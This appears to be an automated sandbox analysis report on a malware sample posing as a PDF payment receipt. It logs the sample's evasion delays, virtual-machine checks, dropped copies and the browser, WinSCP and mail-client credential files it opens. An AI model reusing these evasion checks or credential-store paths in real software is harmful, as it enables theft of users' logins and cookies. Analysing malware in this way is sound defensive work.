                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96312
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96203
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96092
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95984
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95874
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95765
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599875
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599765
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599653
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599547
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599437
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599328
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599218
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599110
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598985
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598860
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598735
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598610
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598485
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598360
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598219
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598109
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598000
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 100000
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99874
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99763
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99655
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99545
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99437
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99327
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99218
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99108
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98999
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98889
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98780
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98671
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98562
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98452
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98343
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98234
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98124
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98014
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97906
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97796
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97686
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97577
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97468
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97358
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99890
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99776
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99672
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99562
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99453
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99343
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99234
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99125
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99015
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98906
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98796
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98687
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98578
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98468
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98359
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98249
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98140
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98030
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97921
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97812
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97702
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97593
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97476
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97375
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599890
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599781
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599672
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599547
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599438
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599313
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599195
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599078
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598969
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598859
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598750
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598641
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598516
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598391
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598281
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598151
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 100000
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99875
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99766
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99641
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99526
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99422
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99313
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99188
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99063
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98954
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98829
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98704
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98579
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98454
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98329
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98204
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98079
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97954
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97829
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97703
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97594
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97485
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97360
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99969
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99859
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99750
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99640
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99531
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99312
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99203
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99007
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98862
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98734
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98498
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98391
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98281
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98157
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96883
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96761
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96656
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96547
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96422
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96312
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96203
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96094
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95969
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95859
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95750
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95641
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95531
                            Source: repeat.exe, 0000000B.00000002.2408937601.000000000268E000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: "&vmware_soap_session
                            Source: repeat.exe, 0000000B.00000002.2408937601.000000000268E000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                            Source: repeat.exe, 0000000B.00000002.2408937601.000000000268E000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: model0Microsoft|VMWare|Virtual
                            Source: Reramvw.exe, 0000000A.00000002.3206524272.00000000011FC000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1991439502.0000000001215000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253763956.0000000006310000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2151160347.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2230741842.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2325501173.0000000000615000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2406307664.0000000000890000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3206231909.000000000112D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: Reramvw.exe, 00000006.00000002.2327172067.00000000016EF000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                            Source: repeat.exe, 00000008.00000002.3206793882.00000000012B7000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe; Process information queried: ProcessInformation
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe; Process token adjusted: Debug
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe; Process token adjusted: Debug
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe; Memory allocated: page read and write | page guard
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe; Process created: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe; Process created: C:\Users\user\AppData\Roaming\Reramvw.exe C:\Users\user\AppData\Roaming\Reramvw.exe
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe; Process created: C:\Users\user\AppData\Roaming\Reramvw.exe C:\Users\user\AppData\Roaming\Reramvw.exe
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe; Process created: C:\Users\user\AppData\Roaming\repeat\repeat.exe C:\Users\user\AppData\Roaming\repeat\repeat.exe
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe; Process created: C:\Users\user\AppData\Roaming\Reramvw.exe C:\Users\user\AppData\Roaming\Reramvw.exe
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe; Process created: C:\Users\user\AppData\Roaming\repeat\repeat.exe C:\Users\user\AppData\Roaming\repeat\repeat.exe
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Users\user\AppData\Roaming\Reramvw.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Users\user\AppData\Roaming\Reramvw.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | Queries volume information: C:\Users\user\AppData\Roaming\repeat\repeat.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                            Stealing of Sensitive Information

                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                            Remote Access Functionality

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 11 Registry Run Keys / Startup Folder | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 11 Registry Run Keys / Startup Folder | 11 Obfuscated Files or Information | 1 Credentials in Registry | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Software Packing | NTDS | 311 Security Software Discovery | Distributed Component Object Model | 1 Input Capture | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 15 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph: ID 1396479; Sample: JUSTIFICANTE DE PAGO CF.pdf.exe; Startdate: 21/02/2024; Architecture: WINDOWS; Score: 100]

Source | Detection | Scanner | Label
JUSTIFICANTE DE PAGO CF.pdf.exe | 34% | ReversingLabs |
JUSTIFICANTE DE PAGO CF.pdf.exe | 100% | Avira | HEUR/AGEN.1363658
JUSTIFICANTE DE PAGO CF.pdf.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\repeat\repeat.exe | 100% | Avira | HEUR/AGEN.1363658
C:\Users\user\AppData\Roaming\Reramvw.exe | 100% | Avira | HEUR/AGEN.1363658
C:\Users\user\AppData\Roaming\repeat\repeat.exe | 100% | Joe Sandbox ML |
